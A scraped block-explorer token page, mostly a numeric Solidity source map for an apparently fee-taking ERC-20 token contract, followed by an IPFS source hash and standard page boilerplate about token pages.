7;13872:19;;33906:158:0;13484:413:1;33774:662:0;-1:-1:-1;;;;;34117:35:0;;;;;;:31;:35;;;;;;;;34116:36;:99;;;;-1:-1:-1;;;;;;34178:37:0;;;;;;:31;:37;;;;;;;;34177:38;34116:99;34090:346;;;34318:15;;-1:-1:-1;;;;;11734:18:0;;11707:7;11734:18;;;;;;;;;;;34292:22;;:6;:22;:::i;:::-;:41;;34258:158;;;;-1:-1:-1;;;34258:158:0;;13326:2:1;34258:158:0;;;13308:21:1;13365:2;13345:18;;;13338:30;13404:33;13384:18;;;13377:61;13455:18;;34258:158:0;13124:355:1;34258:158:0;34523:4;34474:28;11734:18;;;;;;;;;;;34581;;34557:42;;;;;;;34630:35;;-1:-1:-1;34654:11:0;;-1:-1:-1;;;34654:11:0;;;;34630:35;:61;;;;-1:-1:-1;34683:8:0;;;;34682:9;34630:61;:104;;;;;34718:15;-1:-1:-1;;;;;34710:23:0;:4;-1:-1:-1;;;;;34710:23:0;;34708:26;34630:104;:147;;;;-1:-1:-1;;;;;;34752:25:0;;;;;;:19;:25;;;;;;;;34751:26;34630:147;:188;;;;-1:-1:-1;;;;;;34795:23:0;;;;;;:19;:23;;;;;;;;34794:24;34630:188;34612:316;;;34845:8;:15;;-1:-1:-1;;34845:15:0;34856:4;34845:15;;;34875:10;:8;:10::i;:::-;34900:8;:16;;-1:-1:-1;;34900:16:0;;;34612:316;-1:-1:-1;;;;;34980:25:0;;34940:12;34980:25;;;:19;:25;;;;;;34955:4;;34980:25;;;:52;;-1:-1:-1;;;;;;35009:23:0;;;;;;:19;:23;;;;;;;;34980:52;34976:100;;;-1:-1:-1;35059:5:0;34976:100;35088:12;35127:7;35123:628;;;35156:9;;-1:-1:-1;;;35156:9:0;;;;35153:57;;;35184:9;:7;:9::i;:::-;35257:15;-1:-1:-1;;;;;35251:21:0;:2;-1:-1:-1;;;;;35251:21:0;;:42;;;;;35292:1;35276:13;;:17;35251:42;35247:355;;;35348:3;35331:13;;35322:6;:22;;;;:::i;:::-;35321:30;;;;:::i;:::-;35314:37;;35385:4;35370:11;;:19;;;;;;;:::i;:::-;;;;-1:-1:-1;35247:355:0;;-1:-1:-1;35247:355:0;;35456:15;-1:-1:-1;;;;;35448:23:0;:4;-1:-1:-1;;;;;35448:23:0;;:43;;;;;35490:1;35475:12;;:16;35448:43;35444:158;;;35545:3;35529:12;;35520:6;:21;;;;:::i;:::-;35519:29;;;;:::i;:::-;35512:36;;35582:4;35567:11;;:19;;;;;;;:::i;:::-;;;;-1:-1:-1;;35444:158:0;35622:8;;35618:91;;35651:42;35667:4;35681;35688;35651:15;:42::i;:::-;35725:14;35735:4;35725:14;;:::i;:::-;;;35123:628;35763:33;35779:4;35785:2;35789:6;35763:15;:33::i;:::-;32377:3427;;;;32264:3540;;;:::o;22964:132::-;22872:6;;-1:-1:-1;;;;;22872:6:0;4494:10;23028:23;23020:68;;;;-1:-1:-1;;;23020:68:0;;14237:2:1;23020:68:0;;;14219:21:1;;;14256:18;;;14249:30;14315:34;14295:18;;;14288:62;14367:18;;23020:68:0;14035:356:1;24059:191:0;24152:6;;;-1:-1:-1;;;;;24169:17:0;;;-1:-1:-1;;;;;;24169:17:0;;;;;;;24202:40;;24152:6;;;24169:17;24152:6;;24202:40;;24133:16;;24202:40;24122:128;24059:191;:::o;36231:492::-;36324:4;36280:23;11734:18;;;;;;;;;;;36372:11;;36400:20;;;:46;;-1:-1:-1;36424:22:0;;36400:46;36396:85;;;36463:7;;36231:492::o;36396:85::-;36515:18;;36497:15;:36;36493:105;;;36568:18;;36550:36;;36493:105;36612:33;36629:15;36612:16;:33::i;:::-;36666:16;;36658:57;;-1:-1:-1;;;;;36666:16:0;;;;;;;;;36693:21;36658:57;;;;;;;;;36693:21;36666:16;36658:57;;;;;;;;;;;;;;;;;;;31786:470;31870:1;31847:20;;:24;31825:77;;;;-1:-1:-1;;;31825:77:0;;14598:2:1;31825:77:0;;;14580:21:1;14637:2;14617:18;;;14610:30;-1:-1:-1;;;14656:18:1;;;14649:46;14712:18;;31825:77:0;14396:340:1;31825:77:0;31986:20;;;31936:12;;31913:20;;31986:24;;;:::i;:::-;31959:51;;32040:16;32024:12;:32;32021:227;;32088:2;32073:12;:17;;;32105:13;:18;37057:36:::1;36923:178:::0;:::o;32021:227::-;32171:1;32156:12;:16;;;32187:13;:17;32219:9;:17;;-1:-1:-1;;;;32219:17:0;;;31814:442;;31786:470::o;15791:806::-;-1:-1:-1;;;;;15888:18:0;;15880:68;;;;-1:-1:-1;;;15880:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15967:16:0;;15959:64;;;;-1:-1:-1;;;15959:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;16109:15:0;;16087:19;16109:15;;;;;;;;;;;16143:21;;;;16135:72;;;;-1:-1:-1;;;16135:72:0;;14943:2:1;16135:72:0;;;14925:21:1;14982:2;14962:18;;;14955:30;15021:34;15001:18;;;14994:62;-1:-1:-1;;;15072:18:1;;;15065:36;15118:19;;16135:72:0;14741:402:1;16135:72:0;-1:-1:-1;;;;;16243:15:0;;;:9;:15;;;;;;;;;;;16261:20;;;16243:38;;16461:13;;;;;;;;;;:23;;;;;;16513:26;;1361:25:1;;;16461:13:0;;16513:26;;1334:18:1;16513:26:0;;;;;;;16552:37;36731:184;35814:409;35914:16;;;35928:1;35914:16;;;;;;;;35890:21;;35914:16;;;;;;;;;;-1:-1:-1;35914:16:0;35890:40;;35959:4;35941;35946:1;35941:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;35941:23:0;;;-1:-1:-1;;;;;35941:23:0;;;;;26526:42;-1:-1:-1;;;;;35985:19:0;;:21;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;35975:4;35980:1;35975:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;35975:31:0;;;:7;;;;;;;;;;;:31;36019:196;;-1:-1:-1;;;36019:196:0;;26526:42;;36019:65;;:196;;36099:11;;36125:1;;36142:4;;36169;;36189:15;;36019:196;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35869:354;35814:409;:::o;14:131:1:-;-1:-1:-1;;;;;89:31:1;;79:42;;69:70;;135:1;132;125:12;150:315;218:6;226;279:2;267:9;258:7;254:23;250:32;247:52;;;295:1;292;285:12;247:52;334:9;321:23;353:31;378:5;353:31;:::i;:::-;403:5;455:2;440:18;;;;427:32;;-1:-1:-1;;;150:315:1:o;662:548::-;774:4;803:2;832;821:9;814:21;864:6;858:13;907:6;902:2;891:9;887:18;880:34;932:1;942:140;956:6;953:1;950:13;942:140;;;1051:14;;;1047:23;;1041:30;1017:17;;;1036:2;1013:26;1006:66;971:10;;942:140;;;946:3;1131:1;1126:2;1117:6;1106:9;1102:22;1098:31;1091:42;1201:2;1194;1190:7;1185:2;1177:6;1173:15;1169:29;1158:9;1154:45;1150:54;1142:62;;;;662:548;;;;:::o;1397:247::-;1456:6;1509:2;1497:9;1488:7;1484:23;1480:32;1477:52;;;1525:1;1522;1515:12;1477:52;1564:9;1551:23;1583:31;1608:5;1583:31;:::i;:::-;1633:5;1397:247;-1:-1:-1;;;1397:247:1:o;1649:456::-;1726:6;1734;1742;1795:2;1783:9;1774:7;1770:23;1766:32;1763:52;;;1811:1;1808;1801:12;1763:52;1850:9;1837:23;1869:31;1894:5;1869:31;:::i;:::-;1919:5;-1:-1:-1;1976:2:1;1961:18;;1948:32;1989:33;1948:32;1989:33;:::i;:::-;1649:456;;2041:7;;-1:-1:-1;;;2095:2:1;2080:18;;;;2067:32;;1649:456::o;2110:180::-;2169:6;2222:2;2210:9;2201:7;2197:23;2193:32;2190:52;;;2238:1;2235;2228:12;2190:52;-1:-1:-1;2261:23:1;;2110:180;-1:-1:-1;2110:180:1:o;2692:248::-;2760:6;2768;2821:2;2809:9;2800:7;2796:23;2792:32;2789:52;;;2837:1;2834;2827:12;2789:52;-1:-1:-1;;2860:23:1;;;2930:2;2915:18;;;2902:32;;-1:-1:-1;2692:248:1:o;2945:118::-;3031:5;3024:13;3017:21;3010:5;3007:32;2997:60;;3053:1;3050;3043:12;3068:382;3133:6;3141;3194:2;3182:9;3173:7;3169:23;3165:32;3162:52;;;3210:1;3207;3200:12;3162:52;3249:9;3236:23;3268:31;3293:5;3268:31;:::i;:::-;3318:5;-1:-1:-1;3375:2:1;3360:18;;3347:32;3388:30;3347:32;3388:30;:::i;:::-;3437:7;3427:17;;;3068:382;;;;;:::o;3924:388::-;3992:6;4000;4053:2;4041:9;4032:7;4028:23;4024:32;4021:52;;;4069:1;4066;4059:12;4021:52;4108:9;4095:23;4127:31;4152:5;4127:31;:::i;:::-;4177:5;-1:-1:-1;4234:2:1;4219:18;;4206:32;4247:33;4206:32;4247:33;:::i;4317:380::-;4396:1;4392:12;;;;4439;;;4460:61;;4514:4;4506:6;4502:17;4492:27;;4460:61;4567:2;4559:6;4556:14;4536:18;4533:38;4530:161;;4613:10;4608:3;4604:20;4601:1;4594:31;4648:4;4645:1;4638:15;4676:4;4673:1;4666:15;4530:161;;4317:380;;;:::o;4702:127::-;4763:10;4758:3;4754:20;4751:1;4744:31;4794:4;4791:1;4784:15;4818:4;4815:1;4808:15;4834:168;4907:9;;;4938;;4955:15;;;4949:22;;4935:37;4925:71;;4976:18;;:::i;5007:217::-;5047:1;5073;5063:132;;5117:10;5112:3;5108:20;5105:1;5098:31;5152:4;5149:1;5142:15;5180:4;5177:1;5170:15;5063:132;-1:-1:-1;5209:9:1;;5007:217::o;5646:125::-;5711:9;;;5732:10;;;5729:36;;;5745:18;;:::i;6569:245::-;6636:6;6689:2;6677:9;6668:7;6664:23;6660:32;6657:52;;;6705:1;6702;6695:12;6657:52;6737:9;6731:16;6756:28;6778:5;6756:28;:::i;10828:401::-;11030:2;11012:21;;;11069:2;11049:18;;;11042:30;11108:34;11103:2;11088:18;;11081:62;-1:-1:-1;;;11174:2:1;11159:18;;11152:35;11219:3;11204:19;;10828:401::o;11234:399::-;11436:2;11418:21;;;11475:2;11455:18;;;11448:30;11514:34;11509:2;11494:18;;11487:62;-1:-1:-1;;;11580:2:1;11565:18;;11558:33;11623:3;11608:19;;11234:399::o;13902:128::-;13969:9;;;13990:11;;;13987:37;;;14004:18;;:::i;15280:127::-;15341:10;15336:3;15332:20;15329:1;15322:31;15372:4;15369:1;15362:15;15396:4;15393:1;15386:15;15412:251;15482:6;15535:2;15523:9;15514:7;15510:23;15506:32;15503:52;;;15551:1;15548;15541:12;15503:52;15583:9;15577:16;15602:31;15627:5;15602:31;:::i;15668:980::-;15930:4;15978:3;15967:9;15963:19;16009:6;15998:9;15991:25;16035:2;16073:6;16068:2;16057:9;16053:18;16046:34;16116:3;16111:2;16100:9;16096:18;16089:31;16140:6;16175;16169:13;16206:6;16198;16191:22;16244:3;16233:9;16229:19;16222:26;;16283:2;16275:6;16271:15;16257:29;;16304:1;16314:195;16328:6;16325:1;16322:13;16314:195;;;16393:13;;-1:-1:-1;;;;;16389:39:1;16377:52;;16484:15;;;;16449:12;;;;16425:1;16343:9;16314:195;;;-1:-1:-1;;;;;;;16565:32:1;;;;16560:2;16545:18;;16538:60;-1:-1:-1;;;16629:3:1;16614:19;16607:35;16526:3;15668:980;-1:-1:-1;;;15668:980:1:o

Swarm Source

ipfs://ffa55d3acd0d87390727550e17212a7689614fdb18ed4a491fc02999d7abc24f
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.